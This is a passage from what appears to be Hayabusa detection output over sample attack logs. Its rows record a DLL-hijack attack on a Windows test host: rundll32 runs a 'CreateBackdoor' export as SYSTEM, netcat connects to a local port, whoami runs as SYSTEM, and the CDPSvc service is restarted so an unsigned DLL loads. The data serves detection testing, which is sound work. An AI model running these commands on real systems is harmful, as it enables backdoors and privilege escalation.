-s wuauserv | LID: 0x3e7 | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.242 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 7836 | PGUID: 747F3D96-9F69-5E75-0000-0010476F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.247 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.255 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6400 | PGUID: 747F3D96-9F69-5E75-0000-0010DE732000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.388 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.401 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.425 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 8160 | PGUID: 747F3D96-9F69-5E75-0000-001055912000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.434 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 6572 | PGUID: 747F3D96-9F69-5E75-0000-001033922000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.440 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.451 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.463 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 6136 | PGUID: 747F3D96-9F69-5E75-0000-00102F962000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.485 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 1388 | PGUID: 747F3D96-9F69-5E75-0000-001035972000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.486 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.513 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 2028 | PGUID: 747F3D96-9F69-5E75-0000-00105B9A2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.542 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\svchost.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 1652 | PGUID: 747F3D96-9DBC-5E75-0000-00102C390100 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | Process: C:\Windows\System32\rundll32.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:25.569 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - Update Session Orchestrator svc | Image: C:\Windows\System32\WindowsCoreDeviceInfo.dll | Process: C:\Windows\System32\rundll32.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3536 | PGUID: 747F3D96-9F69-5E75-0000-0010729F2000 | Hash: SHA1=4B4F372F74C0048CDD66704BB06BD11A842DF6AE,MD5=BA646D4D090C43EF8F15CA7B468EE25C,SHA256=9DB9D7A8AFD33E3E1936FC591A3ADD3FD720E5E7192E3F27CF7382D2D0411647,IMPHASH=B9A5E3913C4BB505322E605D469C70B6",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: nc.exe 127.0.0.1 1337 | Process: C:\Users\Public\Tools\nc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2935f | PID: 3364 | PGUID: 747F3D96-9F77-5E75-0000-0010D2E62000 | Hash: SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: rundll32 windowscoredeviceinfo.dll,CreateBackdoor | LID: 0x3e7 | PID: 2416 | PGUID: 747F3D96-9F77-5E75-0000-001090F32000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:40.502 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | 
Src: 127.0.0.1:49674 (MSEDGEWIN10) | Dst: 127.0.0.1:1337 (MSEDGEWIN10) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\rundll32.exe | PID: 4848 | PGUID: 747F3D96-9F61-5E75-0000-0010686A1E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 2484 | PGUID: 747F3D96-9F7D-5E75-0000-00104E062100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,PrivEsc | Disc,Run Whoami as SYSTEM,,rules/sigma/process_creation/proc_creation_win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4680 | PGUID: 
747F3D96-9F86-5E75-0000-00101A9F2100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx 2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc stop CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 4876 | PGUID: 747F3D96-0A17-5E76-0000-001062373A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Impact,Stop Windows Service,,rules/sigma/process_creation/proc_creation_win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence or Exec - Services Management | Cmd: sc query CDPSvc | Process: C:\Windows\System32\sc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 1236 | PGUID: 747F3D96-0A1F-5E76-0000-0010375C3A00 | Hash: SHA1=622FA2729408E5F467A592223219DA7C547E7CC7,MD5=ABB56882148DE65D53ABFC55544A49A8,SHA256=78097C7CD0E57902536C60B7FA17528C313DB20869E5F944223A0BA4C801D39B,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program 
Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x2de87 | PID: 3808 | PGUID: 747F3D96-0A28-5E76-0000-0010882B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: net start CDPSvc | Process: C:\Windows\System32\net.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x2de43 | PID: 7072 | PGUID: 747F3D96-0A2B-5E76-0000-0010C02A3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\net1 start CDPSvc | Process: C:\Windows\System32\net1.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: net start CDPSvc | LID: 0x2de43 | PID: 7664 | PGUID: 747F3D96-0A2B-5E76-0000-0010A92C3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 
+09:00,MSEDGEWIN10,1,low,Exec,Service Execution,,rules/sigma/process_creation/proc_creation_win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:35:56.078 +09:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"DLL Hijack - CDPSvc | Image: C:\ProgramData\chocolatey\bin\cdpsgshims.dll | Process: C:\Windows\System32\svchost.exe | Company: ? 
| Signed: false | Signature: Unavailable | PID: 3896 | PGUID: 747F3D96-0A2B-5E76-0000-00101E2F3D00 | Hash: SHA1=B3314F0EEBBB88A8AC5CF790A706B65F962A3722,MD5=3C0D53F2A6341F6D793B1EB114E6FBF6,SHA256=CCCE37A8276ACE489A237A31181DF7E2B6F58D576C2410DE0A9C21F9F9937D12,IMPHASH=FE8C6819894B9677BB9D9642B2550AC9",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.899 +09:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\Public\Tools\nc.exe | PID: 4464 | PGUID: 747F3D96-08DA-5E76-0000-001012352E00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx 2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: whoami | Process: C:\Windows\System32\whoami.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x3e7 | PID: 3696 | PGUID: 747F3D96-0A33-5E76-0000-0010B8813D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 